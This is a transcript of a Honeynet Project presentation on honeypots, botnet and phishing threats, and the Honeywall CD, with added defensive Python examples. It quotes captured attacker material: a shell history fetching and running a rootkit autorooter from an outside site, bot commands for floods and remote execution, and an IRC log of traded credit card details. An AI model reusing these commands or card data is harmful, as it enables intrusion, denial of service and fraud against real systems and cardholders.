Honeypot Project
Presentation Transcript

  • Honeynets and The Honeynet Project
  • Speaker
  • Purpose
    • To explain our organization, our value to you, and our research.
  • Agenda
    • The Honeynet Project and Research Alliance
    • The Threat
    • How Honeynets Work
    • Learning More
  • Honeynet Project
  • Problem
    • How can we defend against an enemy, when we don’t even know who the enemy is?
  • Mission Statement
    • To learn the tools, tactics, and motives involved in computer and network attacks, and share the lessons learned.
  • Our Goal
    • Improve security of Internet at no cost to the public.
      • Awareness: Raise awareness of the threats that exist.
      • Information: For those already aware, we teach and inform about the threats.
      • Research: We give organizations the capabilities to learn more on their own.
  • Honeynet Project
    • Non-profit (501c3) organization with Board of Directors.
    • Funded by sponsors
    • Global set of diverse skills and experiences.
    • Open Source, share all of our research and findings at no cost to the public.
    • Deploy networks around the world to be hacked.
    • Everything we capture is happening in the wild.
    • We have nothing to sell.
  • Honeynet Research Alliance
    • Starting in 2002, the Alliance is a forum of organizations around the world actively researching, sharing and deploying honeypot technologies.
    • http://www.honeynet.org/alliance/
  • Alliance Members
    • South Florida Honeynet Project
    • Georgia Technical Institute
    • Azusa Pacific University
    • USMA Honeynet Project
    • Pakistan Honeynet Project
    • Paladion Networks Honeynet Project (India)
    • Internet Systematics Lab Honeynet Project (Greece)
    • Honeynet.BR (Brazil)
    • UK Honeynet
    • French Honeynet Project
    • Italian Honeynet Project
    • Portugal Honeynet Project
    • German Honeynet Project
    • Spanish Honeynet Project
    • Singapore Honeynet Project
    • China Honeynet Project
  • The Threat
  • What we have captured
    • The Honeynet Project has captured primarily external threats that focus on targets of opportunity.
    • Little has yet been captured on advanced threats; few honeynets to date have been designed to capture them.
  • The Threat
    • Hundreds of scans a day.
    • Fastest time a honeypot was manually compromised: 15 minutes (by a worm: under 60 seconds).
    • Life expectancies: a vulnerable Win32 system lasts under three hours, a vulnerable Linux system three months.
    • Primarily cyber-crime, focus on Win32 systems and their users.
    • Attackers can control thousands of systems (Botnets).
  • The Threat
  • The Motive
    • Motives vary, but we are seeing more and more criminally motivated attackers.
    • Several years ago, hackers hacked computers. Now, criminals hack computers.
    • Fraud, extortion and identity theft have been around for centuries, the net just makes it easier.
  • DDoS for Money
    J4ck: why don't you start charging for packet attacks?
    J4ck: "give me x amount and I'll take bla bla offline for this amount of time"
    J1LL: it was illegal last I checked
    J4ck: heh, then everything you do is illegal. Why not make money off of it?
    J4ck: I know plenty of people that'd pay exorbatent amounts for packeting
  • The Target
    • The mass users.
    • Tend to be non-security aware, making them easy targets.
    • Economies of scale (it’s a global target).
  • Interesting Trends
    • Attacks often originate from economically depressed countries (Romania is an example).
    • Attacks shifting from the computer to the user (computers getting harder to hack).
    • Attackers continue to get more sophisticated.
  • The Tools
    • Attacks used to be primarily worms and autorooters.
    • New advances include Botnets and Phishing.
    • Tools are constantly advancing.
  • The Old Days
    Jan 8 18:48:12 HISTORY: PID=1246 UID=0 lynx www.becys.org/LUCKROOT.TAR
    Jan 8 18:48:31 HISTORY: PID=1246 UID=0 y
    Jan 8 18:48:45 HISTORY: PID=1246 UID=0 tar -xvfz LUCKROOT.TAR
    Jan 8 18:48:59 HISTORY: PID=1246 UID=0 tar -xzvf Lu
    Jan 8 18:49:01 HISTORY: PID=1246 UID=0 tar -xzvf L
    Jan 8 18:49:03 HISTORY: PID=1246 UID=0 tar -xzvf LUCKROOT.TAR
    Jan 8 18:49:06 HISTORY: PID=1246 UID=0 cd luckroot
    Jan 8 18:49:13 HISTORY: PID=1246 UID=0 ./luckgo 216 210
    Jan 8 18:51:07 HISTORY: PID=1246 UID=0 ./luckgo 200 120
    Jan 8 18:51:43 HISTORY: PID=1246 UID=0 ./luckgo 64 120
    Jan 8 18:52:00 HISTORY: PID=1246 UID=0 ./luckgo 216 200
  • Botnets
    • Large networks of hacked systems.
    • Often thousands, if not tens of thousands, of hacked systems under the control of a single user.
    • Automated commands used to control the ‘zombies’.
  • How They Work
    • After successful exploitation, a bot uses TFTP, FTP, or HTTP to download itself to the compromised host.
    • The binary is started, and connects to the hard-coded master IRC server.
    • Often a dynamic DNS name is provided rather than a hard coded IP address, so the bot can be easily relocated.
    • Using a specially crafted nickname like USA|743634, the bot joins the master's channel, sometimes using a password to keep strangers out of the channel.
  • 80% of traffic
    • Port 445/TCP
    • Port 139/TCP
    • Port 135/TCP
    • Port 137/UDP
    • Infected systems most often WinXP-SP1 and Win2000
  • Bots
    • ddos.synflood [host] [time] [delay] [port]: starts a SYN flood
    • ddos.httpflood [url] [number] [referrer] [recursive = true||false]: starts an HTTP flood
    • scan.listnetranges: list scanned netranges
    • scan.start: starts all enabled scanners
    • scan.stop: stops all scanners
    • http.download: download a file via HTTP
    • http.execute: updates the bot via the given HTTP URL
    • http.update: executes a file from a given HTTP URL
    • cvar.set spam_aol_channel [channel]: AOL Spam - Channel name
    • cvar.set spam_aol_enabled [1/0]: AOL Spam - Enabled?
  • Numbers
    • Over a 4-month period
      • More than 100 botnets were tracked.
      • One channel had over 200,000 IP addresses.
      • One computer was compromised by 16 bots.
      • Estimate over 1 million systems compromised.
  • Botnet Economy
    • Botnets are sold or rented.
    • We saw botnets being stolen from one another.
    • Observed harvesting of information from all compromised machines. For example, the operator of the botnet can request a list of CD-keys (e.g. for Windows or games) from all bots. These CD-keys can be sold or used for other purposes since they are considered valuable information.
  • Phishing
    • Social engineer victims to give up valuable information (login, password, credit card number, etc).
    • Easier to hack the user than the computer.
    • New attacks target instant messaging.
    • http://www.antiphishing.org
  • The Sting
  • Getting the Info
  • Infrastructure
    • Attackers build network of thousands of hacked systems (often botnets).
    • Upload pre-made packages for phishing.
    • Use platforms for sending out spoofed email.
    • Use platforms for false websites.
  • A Phishing Rootkit
    • -rw-r--r-- 1 free web 14834 Jun 17 13:16 ebay only
    • -rw-r--r-- 1 free web 247127 Jun 14 19:58 emailer2.zip
    • -rw-r--r-- 1 free web 7517 Jun 11 11:53 html1.zip
    • -rw-r--r-- 1 free web 10383 Jul 3 19:07 index.html
    • -rw-r--r-- 1 free web 413 Jul 18 22:09 index.zip
    • -rw-r--r-- 1 free web 246920 Jun 14 20:38 massmail.tgz
    • -rw-r--r-- 1 free web 8192 Jun 12 07:18 massmail.zip
    • -rw-r--r-- 1 free web 12163 Jun 9 01:31 send.php
    • -rw-r--r-- 1 free web 2094 Jun 20 11:49 sendspamAOL1.tgz
    • -rw-r--r-- 1 free web 2173 Jun 14 22:58 sendspamBUN1.tgz
    • -rw-r--r-- 1 free web 2783 Jun 15 00:21 sendspamBUNzip1.zip
    • -rw-r--r-- 1 free web 2096 Jun 16 18:46 sendspamNEW1.tgz
    • -rw-r--r-- 1 free web 1574 Jul 11 01:08 sendbank1.tgz
    • -rw-r--r-- 1 free web 2238 Jul 18 23:07 sendbankNEW.tgz
    • -rw-r--r-- 1 free web 83862 Jun 9 09:56 spamz.zip
    • -rw-r--r-- 1 free web 36441 Jul 18 00:52 usNEW.zip
    • -rw-r--r-- 1 free web 36065 Jul 11 17:04 bank1.tgz
    • drwxr-xr-x 2 free web 49 Jul 16 12:26 banka
    • -rw-r--r-- 1 free web 301939 Jun 8 13:17 www1.tar.gz
    • -rw-r--r-- 1 free web 327380 Jun 7 16:24 www1.zip
  • Credit Cards Exchanging
    04:55:16 COCO_JAA: !cc
    04:55:23 {Chk}: 0,19(0 COCO_JAA 9)0 CC for U :4,1 Bob Johns|P. O. Box 126|Wendel, CA 25631|United States|510-863-4884|4407070000588951 06/05 (All This ccs update everyday From My Hacked shopping Database - You must regular come here for got all this ccs) 8*** 9(11 TraDecS Chk_Bot FoR #goldcard9)
    04:55:42 COCO_JAA: !cclimit 4407070000588951
    04:55:46 {Chk}: 0,19(0 COCO_JAA 9)0 Limit for Ur MasterCard (5407070000788951) : 0.881 $ (This Doesn't Mean Its Valid) 4*** 0(11 TraDecS Chk_bot FoR #channel)
    04:56:55 COCO_JAA: !cardablesite
    04:57:22 COCO_JAA: !cardable electronics
    04:57:27 {Chk}: 0,19(0 COCO_JAA 9)0 Site where you can card electronics : *** 9(11 TraDecS Chk_bot FoR #goldcard9)
    04:58:09 COCO_JAA: !cclimit 4234294391131136
    04:58:12 {Chk}: 0,19(0 COCO_JAA 9)0 Limit for Ur Visa (4264294291131136) : 9.697 $ (This Doesn't Mean Its Valid) 4*** 0(11 TraDecS Chk_bot FoR #channel)
  • The Future
    • Hacking is profitable, and it is difficult to get caught.
    • Expect more attacks to focus on the end user or the client.
    • Expect things to get worse, bad guys adapt faster.
  • Honeynets
  • Honeypots
    • A honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource.
    • Has no production value; anything going to or from a honeypot is likely a probe, attack or compromise.
    • Primary value to most organizations is information.
  • Advantages
    • Collect small data sets of high value.
    • Reduce false positives
    • Catch new attacks (false negatives)
    • Work in encrypted or IPv6 environments
    • Simple concept requiring minimal resources.
  • Disadvantages
    • Limited field of view (microscope)
    • Risk (mainly high-interaction honeypots)
  • Types
    • Low-interaction
      • Emulates services, applications, and OS’s.
      • Low risk and easy to deploy/maintain, but capture limited information.
    • High-interaction
      • Real services, applications, and OS’s
      • Capture extensive information, but high risk and time intensive to maintain.
  • Examples of Honeypots
    • BackOfficer Friendly
    • KFSensor
    • Honeyd
    • Honeynets
    (figure: examples placed on a scale from Low Interaction to High Interaction)
  • Honeynets
    • High-interaction honeypot designed to capture in-depth information.
    • Information has different value to different organizations.
    • It's an architecture you populate with live systems, not a product or software.
    • Any traffic entering or leaving is suspect.
  • How it works
    • A highly controlled network where every packet entering or leaving is monitored, captured, and analyzed.
      • Data Control
      • Data Capture
      • Data Analysis
  • Honeynet Architecture
  • Data Control
    • Mitigate risk of honeynet being used to harm non-honeynet systems.
    • Count outbound connections.
    • IPS (Snort-Inline)
    • Bandwidth Throttling*
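    The outbound-connection counting described above, as an added example that is not the Honeywall's own code: a sliding-window limiter keyed per honeypot, with the limit value 30 taken from the page's hwctl HwTCPRATE example and the one-hour window assumed here. Inbound traffic is never counted, since the goal is only to stop a compromised honeypot from reaching other systems; the flow records are constructed.

```python
from collections import Counter, defaultdict, deque


class OutboundLimiter:
    """Sliding-window cap on outbound TCP connections per honeypot IP.
    limit=30 mirrors the page's 'hwctl HwTCPRATE=30'; the 3600 s window is an assumption."""

    def __init__(self, limit: int = 30, window_s: int = 3600):
        self.limit = limit
        self.window_s = window_s
        self.history = defaultdict(deque)  # honeypot IP -> timestamps of allowed outbound connections

    def decide(self, ts: float, src: str, proto: str, direction: str) -> str:
        # Only outbound TCP from the honeynet is rate-limited; everything else passes.
        if direction != "out" or proto != "tcp":
            return "allow"
        q = self.history[src]
        while q and ts - q[0] >= self.window_s:  # expire entries older than the window
            q.popleft()
        if len(q) >= self.limit:
            return "drop"  # cap reached: the honeypot cannot be used to attack others
        q.append(ts)
        return "allow"


# Constructed flow records: "ts src dst proto direction"
FLOW_LOG = """\
0    10.0.0.5     198.51.100.7   tcp out
5    10.0.0.5     198.51.100.8   tcp out
9    10.0.0.5     198.51.100.9   tcp out
12   10.0.0.5     198.51.100.10  tcp out
15   203.0.113.4  10.0.0.5       tcp in
20   10.0.0.6     198.51.100.7   udp out
"""


def process_flow_log(log: str, limiter: OutboundLimiter) -> dict:
    """Run each record through the limiter and tally decisions per source address."""
    tally = defaultdict(Counter)
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, src, _dst, proto, direction = line.split()
        tally[src][limiter.decide(float(ts), src, proto, direction)] += 1
    return {src: dict(c) for src, c in tally.items()}


if __name__ == "__main__":
    print(process_flow_log(FLOW_LOG, OutboundLimiter(limit=3)))
```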
  • No Data Control
  • Data Control
  • Snort-Inline
    alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"DNS EXPLOIT named"; flags: A+; content:"|CD80 E8D7 FFFFFF|/bin/sh";)
    alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"DNS EXPLOIT named"; flags: A+; content:"|CD80 E8D7 FFFFFF|/bin/sh"; replace:"|0000 E8D7 FFFFFF|/ben/sh";)
    The first rule only alerts; the second also rewrites the matched bytes in place, so the exploit is broken before it reaches the honeypot.
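    To make the replace behaviour concrete, here is an added Python illustration (not Snort's code) that parses the two rules' content and replace options as they appear on the page, applies them to a constructed packet payload, and enforces the same-length constraint that in-line replacement needs so the packet size stays unchanged.

```python
import re
from typing import Tuple

# The two rules from the page (options only matter here)
RULE_ALERT = ('alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"DNS EXPLOIT named"; '
              'flags: A+; content:"|CD80 E8D7 FFFFFF|/bin/sh";)')
RULE_REPLACE = ('alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"DNS EXPLOIT named"; '
                'flags: A+; content:"|CD80 E8D7 FFFFFF|/bin/sh"; replace:"|0000 E8D7 FFFFFF|/ben/sh";)')

# Constructed payload: NOP sled, the int 0x80 / call pattern, then the /bin/sh string
SAMPLE_PAYLOAD = b"\x90" * 4 + b"\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh" + b"\x00"


def parse_snort_content(spec: str) -> bytes:
    """Decode a content/replace value: text between pipes is hex, the rest is literal."""
    out = bytearray()
    for i, part in enumerate(spec.split("|")):
        if i % 2 == 1:  # odd segments sit between a pair of pipes
            out += bytes.fromhex(part.replace(" ", ""))
        else:
            out += part.encode("latin-1")
    return bytes(out)


def parse_rule_options(rule: str) -> dict:
    """Collect the quoted options (msg, content, replace) from the rule's (...) block."""
    body = rule[rule.index("(") + 1 : rule.rindex(")")]
    return {m.group(1): m.group(2) for m in re.finditer(r'(\w+)\s*:\s*"([^"]*)"', body)}


def apply_inline_rule(rule: str, payload: bytes) -> Tuple[bool, bytes]:
    """Return (matched, resulting payload). Without 'replace' the payload is left as-is
    (alert only); with it, the matched bytes are overwritten in place."""
    opts = parse_rule_options(rule)
    needle = parse_snort_content(opts["content"])
    idx = payload.find(needle)
    if idx < 0 or "replace" not in opts:
        return idx >= 0, payload
    new = parse_snort_content(opts["replace"])
    if len(new) != len(needle):
        # In-line replacement must not change the packet length
        raise ValueError("replace must be the same length as content")
    return True, payload[:idx] + new + payload[idx + len(needle):]
```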
  • Data Capture
    • Capture all activity at a variety of levels.
    • Network activity.
    • Application activity.
    • System activity.
  • Sebek
    • Hidden kernel module that captures all host activity
    • Dumps activity to the network.
    • The attacker cannot sniff Sebek's own traffic: the module hides the packets, which are identified by a magic number and destination port.
  • Sebek Architecture
  • Honeywall CDROM
    • Attempt to combine all requirements of a Honeywall onto a single, bootable CDROM.
    • May, 2003 - Released Eeyore
    • May, 2005 - Released Roo
  • Eeyore Problems
    • OS too minimized, almost crippled. Could not easily add functionality.
    • Difficult to modify, since it was a LiveCD.
    • Limited distributed capabilities
    • No GUI administration
    • No Data Analysis
    • No international or SCSI support
  • Roo Honeywall CDROM
    • Based on Fedora Core 3
    • Vastly improved hardware and international support.
    • Automated, headless installation
    • New Walleye interface for web based administration and data analysis.
    • Automated system updating.
  • Installation
    • Just insert CDROM and boot, it installs to local hard drive.
    • After it reboots for the first time, it runs a hardening script based on NIST and CIS security standards.
    • Following installation, you get a command prompt and system is ready to configure.
  • First Boot
  • Install
  • Configure
  • 3 Methods to Maintain
    • Command Line Interface
    • Dialog Interface
    • Web GUI ( Walleye )
  • Command Line Interface
    • Local or SSH access only.
    • Use the utility hwctl to modify configurations and restart services.
    • # hwctl HwTCPRATE=30
  • Dialog Menu
  • Data Administration
  • Data Analysis
    • Most critical part: the purpose of a honeynet is to gather information and learn.
    • Need a method to analyze all the different elements of information.
    • Walleye is the new solution and comes with the CDROM.
  • Walleye
  • Data Analysis
  • Data Analysis Flows
  • Data Analysis Details
  • Processes
  • Files
  • Distributed Capabilities
  • Issues
    • Honeynets require extensive resources to properly maintain.
    • Detection and anti-honeynet technologies have been introduced.
    • Can be used to attack or harm other non-Honeynet systems.
    • Privacy can be a potential issue.
  • Legal Contact for .mil / .gov
    • Department of Justice; Computer Crime and Intellectual Property Section.
      • Paul Ohm
        • Number: (202) 514.1026
        • E-Mail: [email_address]
  • Learning More
  • Our Website
    • Know Your Enemy papers.
    • Scan of the Month Challenges
    • Latest Tools and Technologies
    • http://www.honeynet.org/
  • Our Book http://www.honeynet.org/book
  • Sponsoring YOU? Advanced Network Management Lab
  • How to Sponsor
    • Sponsor development of a new tool
    • Sponsor authorship of a new research paper.
    • Sponsor research and development.
    • Buy our book
    <project@honeynet.org> http://www.honeynet.org/funds/
  • Conclusion
    • The Honeynet Project is a non-profit, research organization improving the security of the Internet at no cost to the public by providing tools and information on cyber security threats.
    • http://www.honeynet.org
      • <project@honeynet.org>